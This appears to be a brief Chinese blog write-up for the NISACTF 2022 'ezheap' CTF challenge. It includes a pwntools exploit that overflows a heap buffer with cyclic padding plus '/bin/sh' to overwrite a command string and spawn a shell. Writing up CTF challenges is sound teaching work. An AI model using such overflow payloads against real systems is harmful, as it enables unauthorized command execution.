[NISACTF 2022]ezheap wp

发布于 2023-03-13 | 标签: 堆溢出、堆 | 1分钟 | 77字数

此题考查堆溢出

动态调试找出s与command距离之后填充即可

exp:

from pwn import *
context(log_level='debug',arch='x86',os='linux',terminal=['tmux','splitw','-h'])


io=process("./[NISACTF 2022]ezheap")
# io=remote("1.14.71.254",28272)

io.recvuntil("Input:\n")

gdb.attach(io)
pause()

payload=cyclic(0x20)+b"/bin/sh"
io.sendline(payload)

io.interactive()

本文作者： WIN_250
本文链接： https://oraclepi.tech/post/NtN1VUZ6Z/
版权声明： 本博客所有文章除特别声明外，均采用 BY-NC-SA 许可协议。转载请注明出处！

# 堆溢出 # 堆

[HGAME 2022 week1]test your gdb wp 上一篇

[NISACTF 2022]UAF wp 下一篇

[NISACTF 2022]ezheap wp

感谢您的支持，我会继续努力的!